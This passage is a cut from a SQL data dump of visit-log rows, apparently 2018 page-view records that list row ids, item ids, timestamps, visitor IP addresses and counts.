16:58:08','54.85.182.120',11),(3525,6,'2018-02-05 18:17:30','54.85.182.120',10),(3526,8,'2018-02-06 18:34:13','5.165.250.134',5),(3527,6,'2018-02-06 20:02:09','184.154.36.184',8),(3528,7,'2018-02-07 02:04:34','138.197.7.130',1),(3529,6,'2018-02-07 20:07:45','184.154.36.183',5),(3530,8,'2018-02-08 00:20:25','71.121.167.97',3),(3531,7,'2018-02-08 06:34:57','66.249.79.72',2),(3532,8,'2018-02-09 13:26:39','141.8.143.143',4),(3533,6,'2018-02-09 13:46:43','50.225.39.86',6),(3534,7,'2018-02-10 00:57:29','104.236.2.75',3),(3535,6,'2018-02-10 16:36:13','71.255.197.63',6),(3536,8,'2018-02-10 17:08:38','54.85.182.120',5),(3537,6,'2018-02-11 20:05:38','184.154.36.171',5),(3538,8,'2018-02-12 04:49:22','138.197.11.204',6),(3539,7,'2018-02-12 04:49:24','138.197.11.204',4),(3540,6,'2018-02-12 20:08:19','184.154.36.186',7),(3541,7,'2018-02-13 14:39:30','157.55.39.84',4),(3542,6,'2018-02-13 20:13:04','184.154.36.185',7),(3543,8,'2018-02-14 01:27:42','68.134.9.53',7),(3544,7,'2018-02-14 14:51:33','66.250.190.48',2),(3545,6,'2018-02-15 00:00:27','71.121.235.128',8),(3546,8,'2018-02-15 03:20:38','54.85.182.120',3),(3547,6,'2018-02-16 00:10:50','73.173.254.31',11),(3548,6,'2018-02-16 00:10:50','73.173.254.31',1),(3549,7,'2018-02-16 03:18:40','73.180.211.5',4),(3550,8,'2018-02-16 13:21:40','45.55.198.128',6),(3551,6,'2018-02-17 00:14:54','71.179.100.71',7),(3552,7,'2018-02-17 11:13:18','45.55.244.134',5),(3553,8,'2018-02-18 04:24:42','5.255.250.27',5),(3554,6,'2018-02-18 10:45:46','107.178.195.159',19),(3555,7,'2018-02-19 00:45:25','96.244.217.25',4),(3556,6,'2018-02-19 11:36:31','157.55.39.94',9),(3557,8,'2018-02-19 17:03:25','138.197.2.91',3),(3558,6,'2018-02-20 16:55:06','50.225.39.77',8),(3559,8,'2018-02-20 17:14:45','50.225.39.77',3),(3560,7,'2018-02-21 06:05:34','66.249.79.74',2),(3561,8,'2018-02-21 18:09:03','141.8.143.143',8),(3562,6,'2018-02-21 20:01:50','184.154.36.171',13),(3563,7,'2018-02-22 10:21:38','138.197.73.64',3),(3564,6,'2018-02-22 20:03:01','184.154.36.183',10),(3565,8,'2018-02-23 07:16:37','104.131.180.94',5),(3566,7,'2018-02-23 12:46:05','40.77.167.120',1),(3567,6,'2018-02-23 20:14:00','184.154.36.184',4),(3568,7,'2018-02-24 22:53:24','5.102.173.71',3),(3569,6,'2018-02-25 02:40:01','174.61.96.236',9),(3570,8,'2018-02-25 06:22:41','77.75.78.166',5),(3571,6,'2018-02-26 03:06:21','71.179.100.71',17),(3572,7,'2018-02-26 04:37:18','188.165.233.228',4),(3573,8,'2018-02-26 23:14:18','96.234.210.118',4),(3574,6,'2018-02-27 04:27:38','64.74.215.176',9),(3575,8,'2018-02-28 01:20:12','207.46.13.183',12),(3576,7,'2018-02-28 01:54:38','138.197.73.70',2),(3577,6,'2018-02-28 12:28:18','50.225.39.84',10),(3578,7,'2018-03-01 01:59:17','73.58.150.151',4),(3579,8,'2018-03-01 09:47:34','38.94.186.84',9),(3580,6,'2018-03-01 15:16:30','50.225.39.87',12),(3581,7,'2018-03-02 09:28:59','69.58.178.58',3),(3582,8,'2018-03-02 11:35:21','66.249.79.66',7),(3583,6,'2018-03-02 16:56:04','96.255.95.22',7),(3584,7,'2018-03-03 10:03:18','157.55.39.198',4),(3585,6,'2018-03-03 17:52:06','73.213.27.103',5),(3586,8,'2018-03-04 11:55:36','141.8.143.143',5),(3587,6,'2018-03-04 20:12:27','184.154.36.186',7),(3588,7,'2018-03-05 03:31:37','141.8.143.143',1),(3589,8,'2018-03-05 20:05:33','73.135.211.92',21),(3590,6,'2018-03-05 21:05:21','209.190.209.51',10),(3591,7,'2018-03-06 06:43:08','104.131.96.149',4),(3592,8,'2018-03-06 20:14:47','81.209.177.189',5),(3593,6,'2018-03-07 05:08:30','5.255.250.27',7),(3594,7,'2018-03-07 13:15:50','141.8.143.143',2),(3595,8,'2018-03-07 23:27:17','207.46.13.66',5),(3596,6,'2018-03-08 05:25:14','76.111.14.150',17),(3597,7,'2018-03-08 18:12:21','207.46.13.12',4),(3598,8,'2018-03-09 02:13:36','71.127.150.254',3),(3599,6,'2018-03-09 09:04:38','138.197.111.199',11),(3600,7,'2018-03-10 09:30:59','66.249.79.146',4),(3601,6,'2018-03-10 12:45:19','100.36.84.244',28),(3602,8,'2018-03-10 13:02:54','100.36.84.244',9),(3603,6,'2018-03-11 16:42:28','174.205.25.243',14),(3604,8,'2018-03-12 00:04:21','100.16.228.140',12),(3605,7,'2018-03-12 09:43:40','176.31.126.56',3),(3606,6,'2018-03-12 19:03:59','184.154.36.186',17),(3607,8,'2018-03-13 00:24:59','68.134.36.71',11),(3608,7,'2018-03-13 09:59:28','93.158.161.173',4),(3609,6,'2018-03-13 19:55:14','174.205.3.22',13),(3610,8,'2018-03-14 00:32:47','68.134.9.53',11),(3611,7,'2018-03-14 10:34:44','106.120.173.99',8),(3612,6,'2018-03-14 23:33:37','54.85.182.120',12),(3613,8,'2018-03-15 01:01:55','96.244.50.179',6),(3614,6,'2018-03-16 01:15:35','141.8.143.143',6),(3615,7,'2018-03-16 06:57:26','138.197.111.185',2),(3616,8,'2018-03-16 08:15:06','174.204.39.80',8),(3617,6,'2018-03-17 02:19:38','71.127.150.254',6),(3618,7,'2018-03-17 17:03:41','73.39.186.188',5),(3619,6,'2018-03-18 03:22:55','73.173.254.31',8),(3620,7,'2018-03-19 18:22:48','71.179.11.236',2),(3621,6,'2018-03-19 19:03:36','184.154.36.185',2),(3622,8,'2018-03-20 10:55:43','71.244.128.30',3),(3623,6,'2018-03-20 21:16:04','68.134.4.123',9),(3624,7,'2018-03-21 00:16:21','66.249.79.148',2),(3625,8,'2018-03-21 19:07:34','40.77.167.183',6),(3626,6,'2018-03-21 22:13:31','96.244.195.93',9),(3627,7,'2018-03-22 01:58:04','69.250.65.28',2),(3628,8,'2018-03-22 20:38:33','216.99.180.240',12),(3629,6,'2018-03-22 23:31:16','68.134.9.53',8),(3630,6,'2018-03-24 01:31:15','157.55.39.242',10),(3631,8,'2018-03-24 02:06:30','73.128.241.230',7),(3632,7,'2018-03-24 17:39:29','159.89.184.34',5),(3633,6,'2018-03-25 02:47:45','173.64.85.9',21),(3634,8,'2018-03-25 03:17:00','173.64.85.9',14),(3635,7,'2018-03-26 01:54:19','198.27.80.144',2),(3636,6,'2018-03-26 04:54:43','73.129.149.233',21),(3637,8,'2018-03-26 10:07:33','71.121.248.185',17),(3638,8,'2018-03-27 11:33:07','50.225.39.82',10),(3639,6,'2018-03-27 11:39:29','176.14.198.184',8),(3640,7,'2018-03-27 14:21:40','173.69.213.158',4),(3641,6,'2018-03-28 12:20:24','50.225.39.87',12),(3642,8,'2018-03-28 13:20:27','5.255.250.27',13),(3643,7,'2018-03-28 18:45:29','95.213.224.212',2),(3644,6,'2018-03-29 13:33:40','66.249.83.212',10),(3645,8,'2018-03-29 13:40:38','73.200.184.66',14),(3646,7,'2018-03-29 23:03:30','34.194.50.234',7),(3647,6,'2018-03-30 13:51:26','73.173.254.31',20),(3648,8,'2018-03-30 14:27:01','71.244.251.220',5),(3649,7,'2018-03-31 01:33:36','66.249.79.74',9),(3650,6,'2018-03-31 14:46:38','71.179.81.192',15),(3651,8,'2018-03-31 17:38:17','67.167.115.51',10),(3652,7,'2018-04-01 02:32:53','23.237.4.26',13),(3653,7,'2018-04-02 04:42:32','66.249.79.10',10),(3654,6,'2018-04-02 10:52:16','207.46.13.216',4),(3655,8,'2018-04-02 12:14:09','173.69.133.145',1),(3656,7,'2018-04-03 04:47:21','66.249.79.106',4),(3657,8,'2018-04-03 14:08:18','173.69.177.13',2),(3658,6,'2018-04-03 14:31:16','207.46.13.50',2),(3659,7,'2018-04-04 11:39:35','167.114.209.38',1),(3660,6,'2018-04-04 14:42:24','174.205.1.209',3),(3661,8,'2018-04-05 11:58:09','50.225.39.82',4),(3662,7,'2018-04-05 20:29:16','141.8.143.143',1),(3663,8,'2018-04-06 18:20:37','50.225.39.78',2),(3664,6,'2018-04-07 07:43:24','207.46.13.98',5),(3665,7,'2018-04-08 01:57:49','66.249.79.12',1),(3666,8,'2018-04-08 08:53:48','207.46.13.206',1),(3667,6,'2018-04-08 22:00:44','173.64.85.9',4),(3668,7,'2018-04-09 11:17:49','37.187.56.47',3),(3669,8,'2018-04-09 11:26:01','40.77.167.15',2),(3670,8,'2018-04-10 22:18:48','93.158.161.119',2),(3671,6,'2018-04-10 23:17:17','100.43.91.123',2),(3672,7,'2018-04-11 08:07:33','66.70.182.111',2),(3673,6,'2018-04-12 09:14:19','66.249.79.10',2),(3674,7,'2018-04-12 09:22:22','66.249.79.12',2),(3675,8,'2018-04-12 13:13:14','66.249.79.8',2),(3676,7,'2018-04-13 15:28:55','35.205.251.6',3),(3677,8,'2018-04-13 17:49:19','66.249.79.12',1),(3678,6,'2018-04-13 23:38:53','157.55.39.197',1),(3679,8,'2018-04-14 18:03:44','66.249.79.10',1),(3680,7,'2018-04-15 04:11:39','40.77.167.95',2),(3681,6,'2018-04-16 05:49:24','66.249.79.144',3),(3682,8,'2018-04-16 09:32:52','157.55.39.171',2),(3683,7,'2018-04-16 14:17:50','66.249.79.148',3),(3684,8,'2018-04-18 09:31:48','66.249.79.148',1),(3685,6,'2018-04-18 11:14:57','157.55.39.218',2),(3686,7,'2018-04-18 16:58:47','167.114.158.57',3),(3687,7,'2018-04-19 19:51:18','66.249.79.148',3),(3688,6,'2018-04-20 16:05:59','157.55.39.134',1),(3689,8,'2018-04-20 18:56:07','180.76.15.161',1),(3690,6,'2018-04-21 18:59:34','157.55.39.134',1),(3691,7,'2018-04-21 20:03:52','141.8.143.143',4),(3692,8,'2018-04-22 13:36:44','5.255.250.27',2),(3693,7,'2018-04-22 20:51:32','66.249.79.76',5),(3694,6,'2018-04-22 22:17:33','66.249.79.76',4),(3695,8,'2018-04-24 16:15:16','5.255.250.27',1),(3696,7,'2018-04-24 19:49:52','159.203.100.183',3),(3697,6,'2018-04-24 21:34:08','84.201.133.8',4),(3698,6,'2018-04-26 16:38:21','207.46.13.125',2),(3699,7,'2018-04-26 18:13:30','66.249.79.66',6),(3700,8,'2018-04-27 15:30:24','64.239.200.168',1),(3701,7,'2018-04-28 22:01:26','157.55.39.147',1),(3702,8,'2018-04-29 03:15:53','84.201.133.90',4),(3703,6,'2018-04-29 14:01:12','100.43.85.117',3),(3704,7,'2018-04-30 10:19:56','138.197.64.70',5),(3705,6,'2018-05-01 05:13:56','40.77.167.91',1),(3706,7,'2018-05-01 18:55:13','157.55.39.59',1),(3707,6,'2018-05-02 15:03:29','24.173.169.138',2),(3708,7,'2018-05-03 00:02:03','66.249.79.76',4),(3709,8,'2018-05-03 22:36:42','68.134.38.104',2),(3710,6,'2018-05-04 14:08:19','40.77.167.29',1),(3711,7,'2018-05-04 14:46:13','69.58.178.56',1),(3712,7,'2018-05-05 16:40:24','76.177.214.194',1),(3713,6,'2018-05-06 06:59:09','157.55.39.42',3),(3714,8,'2018-05-06 10:19:47','77.88.47.47',3),(3715,7,'2018-05-06 16:59:36','40.77.167.98',6),(3716,6,'2018-05-07 15:46:29','207.46.13.119',4),(3717,6,'2018-05-08 16:53:12','107.77.161.6',4),(3718,8,'2018-05-08 17:01:52','167.102.242.130',6),(3719,7,'2018-05-09 16:50:24','50.250.195.69',1),(3720,6,'2018-05-10 00:07:52','141.8.143.143',3),(3721,8,'2018-05-10 18:46:40','5.255.250.27',1),(3722,7,'2018-05-11 11:31:09','180.76.15.17',2),(3723,6,'2018-05-11 16:05:16','50.225.39.70',1),(3724,7,'2018-05-12 12:24:34','66.249.79.150',2),(3725,7,'2018-05-13 21:13:39','66.249.79.150',1),(3726,7,'2018-05-15 01:28:48','207.46.13.234',2),(3727,7,'2018-05-16 03:21:25','5.255.250.27',2),(3728,6,'2018-05-16 15:09:12','207.46.13.107',5),(3729,8,'2018-05-16 15:24:30','66.249.79.148',2),(3730,8,'2018-05-17 18:23:23','69.60.33.192',2),(3731,6,'2018-05-17 18:45:49','207.46.13.140',1),(3732,7,'2018-05-17 21:54:23','54.215.194.144',3),(3733,6,'2018-05-19 12:58:44','66.249.79.148',2),(3734,7,'2018-05-19 16:49:19','66.249.79.146',11),(3735,8,'2018-05-19 16:57:45','66.249.79.146',4),(3736,7,'2018-05-21 07:22:32','188.165.208.29',2),(3737,6,'2018-05-21 11:25:44','141.8.143.143',2),(3738,7,'2018-05-22 15:35:47','66.249.79.146',2),(3739,6,'2018-05-22 19:26:54','66.249.79.150',3),(3740,8,'2018-05-23 12:36:26','170.211.184.55',1),(3741,6,'2018-05-24 05:45:15','66.249.79.148',1),(3742,7,'2018-05-24 07:20:40','66.249.79.148',3),(3743,8,'2018-05-24 18:45:25','40.77.167.85',1),(3744,7,'2018-05-25 08:43:46','138.197.3.255',1),(3745,8,'2018-05-26 22:59:25','207.46.13.124',2),(3746,6,'2018-05-27 15:52:18','141.8.143.143',4),(3747,8,'2018-05-29 11:45:36','207.46.13.115',2),(3748,7,'2018-05-29 13:07:51','66.249.79.150',5),(3749,8,'2018-05-30 16:20:24','40.77.167.187',2),(3750,6,'2018-05-31 02:57:25','96.241.142.64',1),(3751,7,'2018-05-31 11:11:01','192.3.105.198',4),(3752,7,'2018-06-01 16:26:04','66.249.79.148',1),(3753,8,'2018-06-02 16:13:58','40.77.167.135',3),(3754,6,'2018-06-03 02:15:45','66.249.79.148',3),(3755,7,'2018-06-03 03:23:01','45.55.163.133',3),(3756,8,'2018-06-04 09:02:37','207.46.13.53',2),(3757,6,'2018-06-04 12:25:09','141.8.143.143',1),(3758,7,'2018-06-04 12:33:04','192.95.29.116',3),(3759,8,'2018-06-05 17:36:09','157.55.39.221',2),(3760,6,'2018-06-05 19:09:31','184.154.36.171',2),(3761,7,'2018-06-06 12:09:32','40.77.167.128',3),(3762,6,'2018-06-07 14:58:27','66.249.79.146',1),(3763,7,'2018-06-08 05:43:25','138.197.7.55',2),(3764,8,'2018-06-08 07:10:17','5.255.250.27',4),(3765,6,'2018-06-08 17:05:00','66.249.79.148',4),(3766,7,'2018-06-10 15:24:59','66.249.79.148',7),(3767,6,'2018-06-10 22:49:40','141.8.143.143',3),(3768,8,'2018-06-11 01:06:08','157.55.39.119',3),(3769,7,'2018-06-11 17:40:36','66.249.79.150',11),(3770,7,'2018-06-12 21:18:51','66.249.79.146',6),(3771,8,'2018-06-13 15:30:02','40.77.167.116',2),(3772,7,'2018-06-14 00:59:30','40.77.167.115',3),(3773,6,'2018-06-14 08:11:49','66.249.79.150',5),(3774,8,'2018-06-14 21:52:08','207.46.13.6',3),(3775,7,'2018-06-15 19:03:10','184.154.36.171',2),(3776,8,'2018-06-16 08:42:38','94.23.30.171',2),(3777,6,'2018-06-16 21:26:10','141.8.143.143',2),(3778,7,'2018-06-17 15:54:53','96.255.44.253',5),(3779,6,'2018-06-18 02:40:03','157.55.39.202',1),(3780,7,'2018-06-18 16:06:51','66.249.79.146',3),(3781,7,'2018-06-19 22:19:17','66.249.79.146',6),(3782,6,'2018-06-20 00:06:31','66.249.79.146',3),(3783,8,'2018-06-20 15:50:35','194.187.170.127',2),(3784,7,'2018-06-21 04:38:18','167.114.172.224',1),(3785,6,'2018-06-21 20:04:58','207.46.13.179',2),(3786,8,'2018-06-22 06:39:25','142.0.205.84',4),(3787,7,'2018-06-22 06:40:02','142.0.205.84',3),(3788,6,'2018-06-22 20:43:57','157.55.39.255',3),(3789,7,'2018-06-23 20:25:01','99.203.16.154',3),(3790,8,'2018-06-24 07:18:44','157.55.39.142',2),(3791,6,'2018-06-24 15:14:28','157.55.39.38',1),(3792,7,'2018-06-24 20:36:00','167.114.172.223',2),(3793,6,'2018-06-25 15:44:16','66.249.79.146',2),(3794,7,'2018-06-26 19:36:43','66.249.75.156',6),(3795,6,'2018-06-27 01:21:57','13.77.169.115',2),(3796,8,'2018-06-27 08:28:42','141.8.143.143',5),(3797,7,'2018-06-27 21:49:44','170.115.248.21',10),(3798,8,'2018-06-29 07:44:52','40.77.167.174',3),(3799,7,'2018-06-29 22:32:02','157.55.39.64',1),(3800,6,'2018-07-01 06:31:26','66.249.79.148',2),(3801,8,'2018-07-01 08:22:33','141.8.143.143',1),(3802,7,'2018-07-01 09:12:11','180.76.15.17',7),(3803,8,'2018-07-02 11:33:54','131.253.25.75',2),(3804,7,'2018-07-02 16:56:25','158.69.225.37',2),(3805,6,'2018-07-03 07:17:22','141.8.143.143',1),(3806,6,'2018-07-04 16:25:21','5.255.250.27',1),(3807,8,'2018-07-05 18:41:18','84.201.133.90',3),(3808,7,'2018-07-05 19:02:20','184.154.36.186',2),(3809,6,'2018-07-06 12:09:31','76.104.109.134',2),(3810,8,'2018-07-06 22:31:51','157.55.39.97',2),(3811,7,'2018-07-06 22:31:56','207.46.13.34',3),(3812,6,'2018-07-07 13:52:43','66.249.79.150',2),(3813,7,'2018-07-07 22:35:36','71.244.254.38',4),(3814,6,'2018-07-09 22:55:18','66.249.79.150',1),(3815,8,'2018-07-10 04:56:17','207.46.13.107',1),(3816,6,'2018-07-11 06:34:20','141.8.143.143',2),(3817,7,'2018-07-11 20:09:14','66.249.79.10',7),(3818,8,'2018-07-11 22:07:18','66.249.79.10',2),(3819,7,'2018-07-12 21:47:14','66.249.79.10',4),(3820,6,'2018-07-13 04:13:27','66.249.79.8',2),(3821,7,'2018-07-14 09:37:25','35.187.7.156',1),(3822,8,'2018-07-15 13:36:00','207.46.13.90',1),(3823,7,'2018-07-15 15:35:31','66.249.79.12',3),(3824,6,'2018-07-15 22:50:02','141.8.143.143',1),(3825,7,'2018-07-16 16:40:17','66.249.79.12',3),(3826,7,'2018-07-17 19:23:20','95.213.224.199',3),(3827,8,'2018-07-18 00:44:30','40.77.167.115',1),(3828,6,'2018-07-18 18:28:51','66.249.79.12',3),(3829,7,'2018-07-18 20:07:25','156.33.241.37',6),(3830,8,'2018-07-19 06:32:43','40.77.167.115',2),(3831,7,'2018-07-20 03:29:43','207.46.13.91',4),(3832,6,'2018-07-20 12:26:27','157.55.39.74',2),(3833,7,'2018-07-21 04:41:31','167.114.174.95',5),(3834,7,'2018-07-22 15:51:41','95.213.224.203',4),(3835,8,'2018-07-24 00:21:59','207.46.13.107',4),(3836,6,'2018-07-24 00:25:15','141.8.143.143',6),(3837,7,'2018-07-24 13:33:35','104.192.74.19',6),(3838,7,'2018-07-25 15:53:07','66.249.79.8',8),(3839,8,'2018-07-25 23:21:13','40.77.167.42',1),(3840,7,'2018-07-26 16:29:21','66.249.79.12',3),(3841,6,'2018-07-28 15:33:30','40.77.167.156',2),(3842,8,'2018-07-28 16:15:50','40.77.167.187',6),(3843,7,'2018-07-28 20:18:24','40.77.167.156',2),(3844,8,'2018-07-29 17:34:41','207.46.13.59',1),(3845,7,'2018-07-30 02:41:51','46.105.98.166',1),(3846,6,'2018-07-30 05:54:14','66.249.79.10',3),(3847,7,'2018-07-31 05:03:01','35.229.29.8',3),(3848,6,'2018-07-31 20:53:51','157.55.39.83',1),(3849,8,'2018-08-01 02:21:30','207.46.13.16',1),(3850,7,'2018-08-01 13:19:20','208.49.194.164',3),(3851,6,'2018-08-02 02:42:07','207.46.13.133',1),(3852,8,'2018-08-02 14:13:33','207.46.13.111',2),(3853,7,'2018-08-02 18:50:55','66.249.69.74',1),(3854,6,'2018-08-03 17:16:53','40.77.167.160',3),(3855,8,'2018-08-04 00:09:07','157.55.39.204',2),(3856,6,'2018-08-04 18:15:47','194.187.170.129',5),(3857,7,'2018-08-06 18:06:51','50.225.39.38',2),(3858,8,'2018-08-06 21:37:37','66.249.79.10',4),(3859,6,'2018-08-07 13:50:57','5.255.250.27',1),(3860,7,'2018-08-07 18:38:03','152.180.7.254',3),(3861,8,'2018-08-08 08:33:32','157.55.39.171',2),(3862,7,'2018-08-08 23:44:58','73.171.93.21',2),(3863,6,'2018-08-09 02:42:10','157.55.39.143',2),(3864,8,'2018-08-09 19:35:58','207.46.13.133',2),(3865,6,'2018-08-10 06:12:28','207.46.13.136',3),(3866,7,'2018-08-10 17:03:46','157.55.39.143',1),(3867,8,'2018-08-10 22:51:27','207.46.13.133',4),(3868,8,'2018-08-12 02:40:22','207.46.13.29',2),(3869,6,'2018-08-12 16:16:37','93.158.161.1',2),(3870,7,'2018-08-12 17:25:16','173.255.233.124',4),(3871,10,'2018-08-13 07:07:53','62.197.224.28',43),(3872,8,'2018-08-13 15:35:59','5.255.250.27',1),(3873,7,'2018-08-13 22:08:59','98.166.170.66',9),(3874,10,'2018-08-14 07:30:49','35.237.147.158',38),(3875,6,'2018-08-14 10:09:45','100.43.81.105',1),(3876,10,'2018-08-15 07:53:22','202.80.219.10',55),(3877,6,'2018-08-15 18:08:37','157.55.39.36',6),(3878,7,'2018-08-15 22:57:29','5.255.250.27',6),(3879,10,'2018-08-16 07:56:56','104.196.213.92',32),(3880,8,'2018-08-16 10:02:47','100.43.81.119',3),(3881,10,'2018-08-17 08:14:46','163.172.4.153',41),(3882,6,'2018-08-17 11:58:28','100.43.85.115',2),(3883,7,'2018-08-17 12:28:46','100.43.85.121',1),(3884,8,'2018-08-17 20:59:39','66.249.79.74',2),(3885,10,'2018-08-18 09:07:41','208.80.194.27',33),(3886,6,'2018-08-18 14:28:26','141.8.143.143',5),(3887,7,'2018-08-18 20:53:44','66.249.79.74',6),(3888,8,'2018-08-19 04:32:18','68.33.74.86',3),(3889,10,'2018-08-19 09:30:09','66.249.79.76',59),(3890,7,'2018-08-19 21:12:18','18.212.229.33',1),(3891,10,'2018-08-20 09:47:31','66.249.79.74',50),(3892,6,'2018-08-20 20:28:02','100.16.219.34',6),(3893,8,'2018-08-20 20:37:48','100.16.219.34',4),(3894,7,'2018-08-20 23:50:47','174.205.4.178',5),(3895,10,'2018-08-21 10:05:20','103.39.240.232',35),(3896,6,'2018-08-22 06:11:05','157.55.39.147',3),(3897,10,'2018-08-22 12:02:59','35.155.252.208',49),(3898,7,'2018-08-22 22:56:38','5.255.250.27',2),(3899,8,'2018-08-23 09:08:33','207.46.13.79',3),(3900,6,'2018-08-23 11:42:53','141.8.143.141',1),(3901,10,'2018-08-23 12:19:18','207.46.13.48',25),(3902,10,'2018-08-24 14:09:39','137.226.113.28',58),(3903,6,'2018-08-24 18:23:34','198.51.197.42',3),(3904,8,'2018-08-25 05:27:40','5.255.250.27',5),(3905,7,'2018-08-25 14:17:16','17.58.98.194',1),(3906,10,'2018-08-25 14:35:41','35.227.105.197',41),(3907,6,'2018-08-25 21:22:26','34.209.175.228',1),(3908,10,'2018-08-26 15:30:36','66.249.79.72',39),(3909,6,'2018-08-26 23:17:18','173.67.2.99',5),(3910,8,'2018-08-26 23:26:50','173.67.2.99',2),(3911,7,'2018-08-27 01:57:42','37.187.56.66',3),(3912,10,'2018-08-27 15:47:15','66.249.79.72',43),(3913,7,'2018-08-28 03:41:18','40.77.167.80',2),(3914,10,'2018-08-28 17:08:26','134.249.81.203',47),(3915,8,'2018-08-29 07:59:06','141.8.143.141',5),(3916,6,'2018-08-29 16:15:31','129.2.181.160',3),(3917,10,'2018-08-29 17:28:23','208.80.194.31',43),(3918,7,'2018-08-30 03:09:49','54.38.253.233',3),(3919,8,'2018-08-30 16:28:19','141.8.143.141',6),(3920,10,'2018-08-30 17:41:19','159.142.31.89',38),(3921,7,'2018-08-31 13:08:18','207.46.13.17',2),(3922,10,'2018-08-31 18:58:41','208.80.194.30',33),(3923,8,'2018-09-01 08:14:00','141.8.143.141',3),(3924,10,'2018-09-01 19:07:10','184.154.36.185',26),(3925,6,'2018-09-02 00:08:42','66.249.79.74',2),(3926,7,'2018-09-02 06:59:14','81.171.81.54',1),(3927,10,'2018-09-02 19:49:50','163.172.4.153',23),(3928,7,'2018-09-03 19:13:36','184.154.36.183',1),(3929,10,'2018-09-03 20:29:19','113.30.102.137',27),(3930,8,'2018-09-04 09:15:48','66.249.79.72',10),(3931,10,'2018-09-04 22:07:47','110.138.150.165',31),(3932,6,'2018-09-05 17:00:26','129.2.180.192',2),(3933,6,'2018-09-05 17:00:26','129.2.180.192',1),(3934,7,'2018-09-05 17:39:52','66.249.79.74',2),(3935,10,'2018-09-05 23:14:47','34.222.41.14',41),(3936,8,'2018-09-06 22:48:10','77.88.47.32',1),(3937,10,'2018-09-06 23:37:26','41.249.202.172',37),(3938,6,'2018-09-07 00:43:43','13.66.139.0',4),(3939,7,'2018-09-07 21:28:49','138.197.13.233',2),(3940,10,'2018-09-08 01:02:17','76.186.196.95',28),(3941,10,'2018-09-09 01:09:19','141.8.143.141',38),(3942,10,'2018-09-10 02:41:24','71.204.220.64',53),(3943,7,'2018-09-10 04:37:19','108.31.56.181',6),(3944,10,'2018-09-11 02:50:33','195.22.127.67',37),(3945,7,'2018-09-11 16:47:28','66.249.79.231',3),(3946,6,'2018-09-12 01:41:29','66.249.79.231',2),(3947,10,'2018-09-12 03:31:40','71.179.162.50',45),(3948,10,'2018-09-13 04:52:16','66.249.79.233',58),(3949,6,'2018-09-13 06:05:52','66.249.79.233',3),(3950,7,'2018-09-13 13:22:33','178.154.246.134',4),(3951,10,'2018-09-14 05:09:34','164.132.211.150',50),(3952,7,'2018-09-14 14:38:51','204.62.25.101',4),(3953,8,'2018-09-14 18:45:34','157.55.39.4',2),(3954,6,'2018-09-14 23:09:19','71.127.150.181',5),(3955,10,'2018-09-15 05:38:15','178.79.176.125',8),(3956,7,'2018-09-15 22:54:20','157.55.39.248',7),(3957,6,'2018-09-15 23:56:58','144.217.171.228',3),(3958,8,'2018-09-15 23:57:04','144.217.171.228',2),(3959,10,'2018-09-16 22:23:59','73.128.106.83',10),(3960,7,'2018-09-17 03:04:06','66.249.79.235',3),(3961,6,'2018-09-17 06:09:43','66.249.79.231',8),(3962,10,'2018-09-18 00:15:09','100.16.148.99',2),(3963,7,'2018-09-18 13:38:30','66.249.79.235',2),(3964,6,'2018-09-18 18:37:17','138.197.77.243',5),(3965,8,'2018-09-18 18:37:17','138.197.77.243',2),(3966,6,'2018-09-19 18:49:20','68.134.12.154',2),(3967,8,'2018-09-19 18:59:53','68.134.12.154',6),(3968,7,'2018-09-20 10:42:54','23.229.105.162',5),(3969,10,'2018-09-20 10:42:57','23.229.105.162',7),(3970,6,'2018-09-20 22:18:26','91.242.162.19',2),(3971,7,'2018-09-21 11:03:38','66.249.79.106',2),(3972,8,'2018-09-21 12:46:28','73.180.92.254',5),(3973,7,'2018-09-22 19:14:03','184.154.36.186',3),(3974,6,'2018-09-22 23:26:35','40.77.167.181',5),(3975,8,'2018-09-22 23:28:47','157.55.39.104',2),(3976,10,'2018-09-23 12:26:55','138.197.64.77',5),(3977,8,'2018-09-24 00:20:06','157.55.39.77',3),(3978,6,'2018-09-24 01:32:09','100.36.87.244',7),(3979,7,'2018-09-24 07:52:09','188.165.196.25',4),(3980,8,'2018-09-25 05:51:57','157.55.39.77',1),(3981,6,'2018-09-25 07:12:11','141.8.143.141',3),(3982,10,'2018-09-25 18:13:53','100.36.95.186',3),(3983,8,'2018-09-26 08:59:04','37.9.87.217',2),(3984,7,'2018-09-26 09:30:31','66.249.79.108',2),(3985,10,'2018-09-27 16:54:07','98.117.45.36',2),(3986,7,'2018-09-27 18:59:28','157.55.39.73',4),(3987,8,'2018-09-27 21:50:49','207.46.13.103',3),(3988,6,'2018-09-28 09:50:16','207.46.13.214',4),(3989,7,'2018-09-28 21:14:41','91.242.162.11',1),(3990,6,'2018-09-29 11:21:32','141.8.143.141',6),(3991,10,'2018-09-29 21:23:33','68.134.197.71',3),(3992,7,'2018-09-29 21:55:40','52.53.250.153',2),(3993,6,'2018-09-30 16:24:14','96.255.219.159',3),(3994,7,'2018-09-30 22:13:25','67.191.119.115',1),(3995,6,'2018-10-01 19:02:48','184.154.36.186',7),(3996,10,'2018-10-01 21:01:11','158.69.116.77',5),(3997,8,'2018-10-01 21:01:16','158.69.116.77',5),(3998,7,'2018-10-02 03:55:08','52.24.106.37',8),(3999,6,'2018-10-02 19:10:08','184.154.36.184',9),(4000,8,'2018-10-02 22:00:23','141.8.143.141',7),(4001,10,'2018-10-03 03:26:14','209.97.147.25',5),(4002,7,'2018-10-03 05:40:58','158.69.241.223',9),(4003,6,'2018-10-03 19:10:51','184.154.36.183',5),(4004,8,'2018-10-04 12:18:40','38.77.216.73',5),(4005,10,'2018-10-04 18:06:03','167.114.209.38',1),(4006,7,'2018-10-04 18:06:22','167.114.209.38',2),(4007,6,'2018-10-05 19:05:22','184.154.36.183',4),(4008,7,'2018-10-05 21:11:23','178.154.246.134',2),(4009,8,'2018-10-06 05:36:55','40.77.167.99',1),(4010,6,'2018-10-06 19:06:28','184.154.36.184',3),(4011,8,'2018-10-07 08:53:58','5.255.250.27',1),(4012,10,'2018-10-07 16:07:59','40.77.167.55',4),(4013,7,'2018-10-07 20:32:47','96.255.39.5',4),(4014,6,'2018-10-08 01:12:00','96.244.99.137',7),(4015,8,'2018-10-08 09:46:01','37.187.56.76',3),(4016,7,'2018-10-08 22:18:44','40.77.167.24',3),(4017,10,'2018-10-09 02:04:23','142.93.69.222',9),(4018,6,'2018-10-09 02:04:24','142.93.69.222',3),(4019,8,'2018-10-09 14:46:31','157.55.39.74',3),(4020,7,'2018-10-10 01:42:06','54.197.159.228',4),(4021,6,'2018-10-10 07:31:57','207.46.13.215',4),(4022,6,'2018-10-11 14:04:58','66.249.73.74',4),(4023,10,'2018-10-11 18:48:20','159.203.101.95',1),(4024,7,'2018-10-11 